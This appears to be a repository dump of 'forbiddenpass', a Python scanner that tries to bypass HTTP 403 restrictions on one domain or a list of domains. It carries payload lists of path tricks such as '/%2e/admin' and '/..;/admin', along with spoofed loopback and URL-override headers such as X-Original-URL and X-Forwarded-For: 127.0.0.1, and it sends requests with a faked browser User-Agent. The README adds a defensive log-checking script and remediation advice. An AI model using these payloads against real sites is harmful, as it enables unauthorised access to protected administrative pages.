Repository: gotr00t0day/forbiddenpass
Branch: main
Commit: 6b313649fac2
Files: 5
Total size: 8.7 KB
Directory structure:
gitextract_wioenkpz/
├── README.md
├── admin.txt
├── bypasses.txt
├── forbiddenpass.py
└── requirements.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# UPDATE
Thanks to Knowledge-Wisdom-Understanding (MrPMillz) for making the script cleaner and fixing the header payloads.
# INSTALLATION
```bash
git clone https://github.com/gotr00t0day/forbiddenpass.git
cd forbiddenpass
pip3 install -r requirements.txt
python3 forbiddenpass.py -h
```
# USAGE
```bash
___________ ___. .__ .___ .___ __________
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____\______ \_____ ______ ______
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \| ___/\__ \ / ___// ___/
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \ | / __ \_\___ \ \___ \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /____| (____ /____ >____ >
\/ \/ \/ \/ \/ \/ \/ \/ \/ v1.0
usage: forbiddenpass.py [-h] [-p domain.com] [-d filename.txt] [-t site.com]

optional arguments:
  -h, --help            show this help message and exit
  -p domain.com, --path domain.com
                        path to check
  -d filename.txt, --domains filename.txt
                        domains to check
  -t site.com, --target site.com
                        domain to check
```
# EXAMPLE
domains to check
```
python3 forbiddenpass.py -d domains.txt
```
domains to check with a path
```
python3 forbiddenpass.py -d domains.txt --path login
```
scan a single target
```
python3 forbiddenpass.py -t https://site
```
scan a single target with a path
```
python3 forbiddenpass.py -t https://site --path login
```
# DISCLAIMER
Inspired by https://github.com/iamj0ker/bypass-403

bypass-403 doesn't support scanning multiple domains and I needed to speed things up a bit so forbiddenpass was created
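
Added example, not part of forbiddenpass: a defender-side check for the request shapes this tool sends, i.e. the path tricks in admin.txt and the loopback and URL-override headers listed in forbiddenpass.py. It canonicalises a logged path the way a lenient backend would and flags a request whose raw form differs from a protected canonical path; the `PROTECTED` prefix, the function names and the sample requests are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Header names taken from header_bypass() in forbiddenpass.py; a client should
# never be able to set these, only a trusted reverse proxy.
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url"}
CLIENT_IP_HEADERS = {"x-forwarded-for", "x-custom-ip-authorization",
                     "x-originating-ip", "true-client-ip", "x-remote-ip",
                     "x-client-ip", "x-proxyuser-ip"}
PROTECTED = ("/admin",)  # assumption: prefixes the front end is meant to deny


def canonical_path(raw: str) -> str:
    """Reduce a request target to the path a lenient backend would route."""
    path = raw.split("#", 1)[0].split("?", 1)[0]
    for _ in range(3):  # undo nested encoding such as %252f
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop ";params" from each segment (servlet-style path parameters).
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = posixpath.normpath("/" + path.strip(" \t"))
    return re.sub(r"/{2,}", "/", path).lower()


def findings(raw_path: str, headers: dict) -> list:
    """Return the reasons a logged request looks like a 403-bypass probe."""
    reasons = []
    canon = canonical_path(raw_path)
    protected = any(canon == p or canon.startswith(p + "/") for p in PROTECTED)
    if protected and raw_path.split("?", 1)[0] != canon:
        reasons.append(f"path {raw_path!r} canonicalises to {canon!r}")
    for name, value in headers.items():
        if name.lower() in OVERRIDE_HEADERS:
            reasons.append(f"client-supplied {name}")
        elif name.lower() in CLIENT_IP_HEADERS and "127.0.0.1" in value:
            reasons.append(f"loopback address in {name}")
    return reasons


if __name__ == "__main__":
    # Constructed sample requests (path, headers) as an edge proxy would log them.
    sample = [("/%2e/admin", {}), ("/admin;/", {}), ("/index.html", {}),
              ("/admin", {"X-Forwarded-For": "127.0.0.1:80"})]
    for path, hdrs in sample:
        print(path, hdrs, findings(path, hdrs))
```

Run it against edge-proxy logs, before any trusted proxy appends its own X-Forwarded-For. The durable fix is to apply the access rule to the canonical path and to strip these headers from client requests.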
================================================
FILE: admin.txt
================================================
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
================================================
FILE: bypasses.txt
================================================
/
/%2e/
//.
////
/.//./
/.;/
/%20
/../
%09
%20
%%%%20
%%%%23%%%%3f
%%%%252f%%%%252f
%%%%252f/
%%%%2e%%%%2e
%%%%2e%%%%2e/
%%%%2f
%%%%2f%%%%20%%%%23
================================================
FILE: forbiddenpass.py
================================================
from colorama import Fore, Back, Style
from fake_useragent import UserAgent
import concurrent.futures
import requests
import argparse
import sys
import json
banner = r"""
___________ ___. .__ .___ .___ __________
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____\______ \_____ ______ ______
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \| ___/\__ \ / ___// ___/
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \ | / __ \_\___ \ \___ \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /____| (____ /____ >____ >
\/ \/ \/ \/ \/ \/ \/ \/ \/ v1.1
by c0d3Ninja, MrPMillz
"""
print(Fore.CYAN + banner)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('-p', '--path', action='store',
                   type=str, help='path to check',
                   metavar='domain.com')
parser.add_argument('-d', '--domains', action='store',
                    help="domains to check",
                    metavar="filename.txt")
parser.add_argument('-t', '--target', action='store',
                    help="domain to check",
                    metavar="site.com")
args = parser.parse_args()
ua = UserAgent()


def word_list(wordlist: str) -> list:
    try:
        with open(wordlist, 'r') as f:
            _wordlist = [x.strip() for x in f.readlines()]
        return _wordlist
    except FileNotFoundError as fnf_err:
        print(f"FileNotFoundError: {fnf_err}")
        sys.exit(1)


wordlist = word_list("bypasses.txt")


def header_bypass(path=None):
    # One header set per request: the first is the baseline (User-Agent only),
    # each of the others adds a single client-IP or URL-override header.
    headers = [
        {'User-Agent': str(ua.chrome)},
        {'User-Agent': str(ua.chrome), 'X-Original-URL': path if path else '/'},
        {'User-Agent': str(ua.chrome), 'X-Custom-IP-Authorization': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': '127.0.0.1:80'},
        {'User-Agent': str(ua.chrome), 'X-Originally-Forwarded-For': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Originating-': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Originating-IP': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'True-Client-IP': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-WAP-Profile': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Arbitrary': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-HTTP-DestinationURL': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Proto': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'Destination': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Remote-IP': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Client-IP': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Host': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Host': 'http://127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-ProxyUser-Ip': '127.0.0.1'},
        {'User-Agent': str(ua.chrome), 'X-rewrite-url': path if path else '/'}
    ]
    return headers


def port_based_bypass(path=None):
    # Defined but never called by the script; path is accepted and unused.
    headers = [
        {'User-Agent': str(ua.chrome)},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '4443'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '80'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8080'},
        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8443'}
    ]
    # The original built the list without returning it, so the function yielded None.
    return headers


def do_request(url: str, stream=False, path=None):
    if path:
        headers = header_bypass(path=path)
    else:
        headers = header_bypass()
    try:
        # Send the same URL once per header set and print the status code,
        # labelled with the last header of the set (the one under test).
        for header in headers:
            if stream:
                r = requests.get(url, stream=True, headers=header)
            else:
                r = requests.get(url, headers=header)
            if r.status_code == 200:
                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.GREEN + " [{}]".format(r.status_code))
            else:
                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.RED + " [{}]".format(r.status_code))
    except requests.exceptions.ConnectionError:
        # Unreachable hosts are skipped silently.
        pass
    except requests.exceptions.Timeout as t_error:
        print("Connection Timeout Error: ", t_error)
    except requests.exceptions.RequestException as req_err:
        print("Some Ambiguous Exception:", req_err)


def main(wordlist):
    if args.domains:
        if args.path:
            print(Fore.CYAN + "Checking domains to bypass....")
            checklist = word_list(args.domains)
            for lines in checklist:
                for bypass in wordlist:
                    links = lines + "/" + args.path + bypass
                    do_request(links, stream=True, path=args.path)
        else:
            print(Fore.CYAN + "Checking domains to bypass....")
            checklist = word_list(args.domains)
            for lines in checklist:
                for bypass in wordlist:
                    links = lines + bypass
                    do_request(links, stream=True)
    if args.target:
        if args.path:
            print(Fore.GREEN + f"Checking {args.target}...")
            for bypass in wordlist:
                links = args.target + "/" + args.path + bypass
                do_request(links, path=args.path)
        else:
            print(Fore.GREEN + f"Checking {args.target}...")
            for bypass in wordlist:
                links = args.target + bypass
                do_request(links)
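

if __name__ == "__main__":
    try:
        with concurrent.futures.ThreadPoolExecutor() as executor:
            # main() iterates over a list of payloads. Mapping it over the raw
            # wordlist handed each worker one string, which main() then split
            # into single characters; pass one-item lists instead.
            executor.map(main, [[bypass] for bypass in wordlist])
    except KeyboardInterrupt:
        sys.exit(0)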
================================================
FILE: requirements.txt
================================================
colorama
requests
fake-useragent
argparse